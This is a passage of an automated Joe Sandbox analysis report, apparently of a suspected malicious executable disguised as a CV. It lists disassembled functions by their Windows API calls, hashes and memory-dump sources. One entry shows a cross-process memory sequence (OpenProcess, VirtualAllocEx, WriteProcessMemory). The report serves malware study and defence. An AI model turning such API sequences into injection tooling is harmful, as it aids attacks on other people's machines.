                                                                                        • Instruction Fuzzy Hash: E621B3B4800309EFEF12DF95ED887AE7B68B711355F16433AE525A61B0D3708885CF94
                                                                                        APIs
                                                                                        • __calloc_crt.LIBCMT ref: 003A21A9
                                                                                        • CreateThread.KERNEL32(?,?,003A22DF,00000000,?,?), ref: 003A21ED
                                                                                        • GetLastError.KERNEL32 ref: 003A21F7
                                                                                        • _free.LIBCMT ref: 003A2200
                                                                                        • __dosmaperr.LIBCMT ref: 003A220B
                                                                                          • Part of subcall function 003A7C0E: __getptd_noexit.LIBCMT ref: 003A7C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                        • String ID:
                                                                                        • API String ID: 2664167353-0
                                                                                        • Opcode ID: 22ff4b3b73249fce34d91dc396335ba3c416294d3282f2f9624bb998722ab48d
                                                                                        • Instruction ID: 10c5babc1aecb064ff0f46e0f2d3497ad9f912a31b77fa470df2e5ab7c82be52
                                                                                        • Opcode Fuzzy Hash: 22ff4b3b73249fce34d91dc396335ba3c416294d3282f2f9624bb998722ab48d
                                                                                        • Instruction Fuzzy Hash: E111F933104306AFDB23AFA9DD82EAB7B98EF47770B110529FD14DA191EB71D81187A1
                                                                                        APIs
                                                                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 003BABD7
                                                                                        • GetLastError.KERNEL32(?,003BA69F,?,?,?), ref: 003BABE1
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,003BA69F,?,?,?), ref: 003BABF0
                                                                                        • HeapAlloc.KERNEL32(00000000,?,003BA69F,?,?,?), ref: 003BABF7
                                                                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 003BAC0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 842720411-0
                                                                                        • Opcode ID: b0508375c23565fe713e38d59a9ab9b7d0f1d91b54114341417e63faddb5522f
                                                                                        • Instruction ID: 70ecaf4c0b116ee88ad54b99aea877615ec1248c5f1636c5ce1d0e206b621026
                                                                                        • Opcode Fuzzy Hash: b0508375c23565fe713e38d59a9ab9b7d0f1d91b54114341417e63faddb5522f
                                                                                        • Instruction Fuzzy Hash: 8C016970700604BFDB114FA9DD48DAB3FACEF8A7587110829F905D3260DA718C84CB64
                                                                                        APIs
                                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003C7A74
                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 003C7A82
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003C7A8A
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 003C7A94
                                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003C7AD0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                        • String ID:
                                                                                        • API String ID: 2833360925-0
                                                                                        • Opcode ID: ccc376595c38c9b3ab92af222bc49db5706203fc73b217a27a5ef204173fd5f0
                                                                                        • Instruction ID: ed01d01147fdcb828dae1329c41527c5b081fc4305b1cbec4018a43b40b52926
                                                                                        • Opcode Fuzzy Hash: ccc376595c38c9b3ab92af222bc49db5706203fc73b217a27a5ef204173fd5f0
                                                                                        • Instruction Fuzzy Hash: 33012939C04619EBCF01AFE9DD48EEDBB78FB1C711F010569E902F2250DB349A548BA5
                                                                                        APIs
                                                                                        • CLSIDFromProgID.OLE32 ref: 003B9ADC
                                                                                        • ProgIDFromCLSID.OLE32(?,00000000), ref: 003B9AF7
                                                                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 003B9B05
                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 003B9B15
                                                                                        • CLSIDFromString.OLE32(?,?), ref: 003B9B21
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 3897988419-0
                                                                                        • Opcode ID: 79883fb6a73f728c0cfe8c3b6d540754da6663e7d2691bca7c064f0c0f579972
                                                                                        • Instruction ID: 8def84fb6e5fdbe6736a6120114d575c22c3b60e0dec92054008fd01797d59a6
                                                                                        • Opcode Fuzzy Hash: 79883fb6a73f728c0cfe8c3b6d540754da6663e7d2691bca7c064f0c0f579972
                                                                                        • Instruction Fuzzy Hash: 4D018F7AA00218BFDB129F94ED44BAA7BEDEF88355F158035FA05E6210D770DD449BA0
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003BAA79
                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003BAA83
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003BAA92
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003BAA99
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003BAAAF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: 444b854f02c7207f31be07847f5ebe20c32d71f8ab6849b1a16716ca7d67afff
                                                                                        • Instruction ID: 7c706fa0eea19ac60b105df9809ee81f1e8b47102be89b2f28286f4af16f067e
                                                                                        • Opcode Fuzzy Hash: 444b854f02c7207f31be07847f5ebe20c32d71f8ab6849b1a16716ca7d67afff
                                                                                        • Instruction Fuzzy Hash: AAF0A931600604AFEB121FE4AD88EAB3BACFF4A758F000029FA05D71A0DA709C45CA71
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003BAADA
                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003BAAE4
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003BAAF3
                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003BAAFA
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003BAB10
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: 199e30c63cb3768ccd7358fd55f718d4aa46025bb5d83dd8703ec8d56997da90
                                                                                        • Instruction ID: 208648feee55e2f5cba8a2e551f334132dc716953179f83e8c3eb43383823593
                                                                                        • Opcode Fuzzy Hash: 199e30c63cb3768ccd7358fd55f718d4aa46025bb5d83dd8703ec8d56997da90
                                                                                        • Instruction Fuzzy Hash: 71F04F757106086FEB124FA4EC88EA73B6DFF49758F000039FA56D7190CA709C458A61
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 003BEC94
                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 003BECAB
                                                                                        • MessageBeep.USER32(00000000), ref: 003BECC3
                                                                                        • KillTimer.USER32(?,0000040A), ref: 003BECDF
                                                                                        • EndDialog.USER32(?,00000001), ref: 003BECF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3741023627-0
                                                                                        • Opcode ID: a0b598b9fe2d8ac5cd9e3c71011da9e0669ff0f41be8794d919a9230afc494de
                                                                                        • Instruction ID: af20b78eb749b50cd51584c533c194703ecfa06c7614b145023364c159d888d6
                                                                                        • Opcode Fuzzy Hash: a0b598b9fe2d8ac5cd9e3c71011da9e0669ff0f41be8794d919a9230afc494de
                                                                                        • Instruction Fuzzy Hash: F6018630900714ABEB255B54DF4EBD67B78FB00B09F000569F642718E0DBF4A988DB84
                                                                                        APIs
                                                                                        • EndPath.GDI32(?), ref: 0039B0BA
                                                                                        • StrokeAndFillPath.GDI32(?,?,003FE680,00000000,?,?,?), ref: 0039B0D6
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0039B0E9
                                                                                        • DeleteObject.GDI32 ref: 0039B0FC
                                                                                        • StrokePath.GDI32(?), ref: 0039B117
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                        • String ID:
                                                                                        • API String ID: 2625713937-0
                                                                                        • Opcode ID: b69d6d28d807f4dab5096d6f2725f8f39adcef703b99762db361698c4b1a92e3
                                                                                        • Instruction ID: d15d8a8987749d2281f76a6ed66c983d85651a0df9d815b19c14a06cd361c879
                                                                                        • Opcode Fuzzy Hash: b69d6d28d807f4dab5096d6f2725f8f39adcef703b99762db361698c4b1a92e3
                                                                                        • Instruction Fuzzy Hash: 1BF03C38000304EFDB229FA5FE0C7593F64A702366F098324F429580F0C7308999CF58
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 003CF2DA
                                                                                        • CoCreateInstance.OLE32(0040DA7C,00000000,00000001,0040D8EC,?), ref: 003CF2F2
                                                                                        • CoUninitialize.OLE32 ref: 003CF555
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateInitializeInstanceUninitialize
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 948891078-24824748
                                                                                        • Opcode ID: ae1d03d13e4d782ccc9f642db63c49446bbd433c2c9f1611e13f657532eb3d18
                                                                                        • Instruction ID: b68fc4cbe632348dcd49ac2bd9c44683b2ff55352f58e856d83e38c67690c2db
                                                                                        • Opcode Fuzzy Hash: ae1d03d13e4d782ccc9f642db63c49446bbd433c2c9f1611e13f657532eb3d18
                                                                                        • Instruction Fuzzy Hash: 15A11CB2504301AFD701EF64C881EABB7E8EF98714F00495DF5559B192EB70EA49CB62
                                                                                        APIs
                                                                                          • Part of subcall function 0038660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003853B1,?,?,003861FF,?,00000000,00000001,00000000), ref: 0038662F
                                                                                        • CoInitialize.OLE32(00000000), ref: 003CE85D
                                                                                        • CoCreateInstance.OLE32(0040DA7C,00000000,00000001,0040D8EC,?), ref: 003CE876
                                                                                        • CoUninitialize.OLE32 ref: 003CE893
                                                                                          • Part of subcall function 0038936C: __swprintf.LIBCMT ref: 003893AB
                                                                                          • Part of subcall function 0038936C: __itow.LIBCMT ref: 003893DF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 2126378814-24824748
                                                                                        • Opcode ID: 19e6bb6a69cadee01918f97a83a24c1eadda0ea6f48c6e8f2535011fd94f7d50
                                                                                        • Instruction ID: 1207f57f74d4bd8b4dc7ae7c8573314fc2285ed876fafc599f427c48a4637cbc
                                                                                        • Opcode Fuzzy Hash: 19e6bb6a69cadee01918f97a83a24c1eadda0ea6f48c6e8f2535011fd94f7d50
                                                                                        • Instruction Fuzzy Hash: D6A145356043019FCB12EF24C884E2ABBE5BF89710F15899DF9969B3A1CB31ED45CB91
                                                                                        APIs
                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 003A32ED
                                                                                          • Part of subcall function 003AE0D0: __87except.LIBCMT ref: 003AE10B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorHandling__87except__start
                                                                                        • String ID: pow
                                                                                        • API String ID: 2905807303-2276729525
                                                                                        • Opcode ID: 3ef5a3f31a89f606970533f7e26db543c053057bb46838a20c1ae9df0959ab25
                                                                                        • Instruction ID: c82bd07e8bc22f42966387daf8eb775a320028564ab94acdc79c757a42ce8afc
                                                                                        • Opcode Fuzzy Hash: 3ef5a3f31a89f606970533f7e26db543c053057bb46838a20c1ae9df0959ab25
                                                                                        • Instruction Fuzzy Hash: ED517A71A0C20197CF177718CA423BA3B98DB43750F258E68F4D5862E9EF788E949B46
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0041DC50,?,0000000F,0000000C,00000016,0041DC50,?), ref: 003C4645
                                                                                          • Part of subcall function 0038936C: __swprintf.LIBCMT ref: 003893AB
                                                                                          • Part of subcall function 0038936C: __itow.LIBCMT ref: 003893DF
                                                                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 003C46C5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper$__itow__swprintf
                                                                                        • String ID: REMOVE$THIS
                                                                                        • API String ID: 3797816924-776492005
                                                                                        • Opcode ID: 44c31a715ee8da238478278df409aabee813ceec3444086304d9bb5ce63a5d4d
                                                                                        • Instruction ID: d9511b868e1485cedbec3b8da71afe0b27debda7be10392511f15c6ba13c7ea2
                                                                                        • Opcode Fuzzy Hash: 44c31a715ee8da238478278df409aabee813ceec3444086304d9bb5ce63a5d4d
                                                                                        • Instruction Fuzzy Hash: 02416C34A002099FCF02EFA4C891EADB7B5FF49304F148069E926EB2A2DB35DD45CB50
                                                                                        APIs
                                                                                          • Part of subcall function 003C430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003BBC08,?,?,00000034,00000800,?,00000034), ref: 003C4335
                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 003BC1D3
                                                                                          • Part of subcall function 003C42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003BBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 003C4300
                                                                                          • Part of subcall function 003C422F: GetWindowThreadProcessId.USER32(?,?), ref: 003C425A
                                                                                          • Part of subcall function 003C422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,003BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 003C426A
                                                                                          • Part of subcall function 003C422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,003BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 003C4280
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003BC240
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003BC28D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                        • String ID: @
                                                                                        • API String ID: 4150878124-2766056989
                                                                                        • Opcode ID: 6b1f8483b14ebfa84e8ab27685f5d77cb7042540760018581bac765aa2f0b6e0
                                                                                        • Instruction ID: 46312158c3adc1e4049e1c18d1666d5c007cc31b2628a121f611c52fc8af24fb
                                                                                        • Opcode Fuzzy Hash: 6b1f8483b14ebfa84e8ab27685f5d77cb7042540760018581bac765aa2f0b6e0
                                                                                        • Instruction Fuzzy Hash: C7412D76900218AFDB11DFA4CD91FEEB778AF49700F004499FA45BB181DA716E45CB61
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0041DC00,00000000,?,?,?,?), ref: 003EA6D8
                                                                                        • GetWindowLongW.USER32 ref: 003EA6F5
                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003EA705
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long
                                                                                        • String ID: SysTreeView32
                                                                                        • API String ID: 847901565-1698111956
                                                                                        • Opcode ID: 0d9451f95c51043b6a2159be0876ecfa31df6041073546d894acc23ebcac04ca
                                                                                        • Instruction ID: b719398f653871c21f0f8c5b592d1fff3221bec695ceaf3f98f2f0473eb6c41b
                                                                                        • Opcode Fuzzy Hash: 0d9451f95c51043b6a2159be0876ecfa31df6041073546d894acc23ebcac04ca
                                                                                        • Instruction Fuzzy Hash: 3F31DE31600659ABDF128F79CC41BEA7BA9EB49324F254725F875A32E0C730F8509B94
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003D5190
                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 003D51C6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CrackInternet_memset
                                                                                        • String ID: |$D=
                                                                                        • API String ID: 1413715105-3304556432
                                                                                        • Opcode ID: 556c9ef6765809e0bc568177f1af3d16559a413e5c0bbd30169dfbe6bbda0346
                                                                                        • Instruction ID: 86c9d5dfad665af3e9bd9f41189b34f00fb2c8580f4f8e94d22db6256b9780ea
                                                                                        • Opcode Fuzzy Hash: 556c9ef6765809e0bc568177f1af3d16559a413e5c0bbd30169dfbe6bbda0346
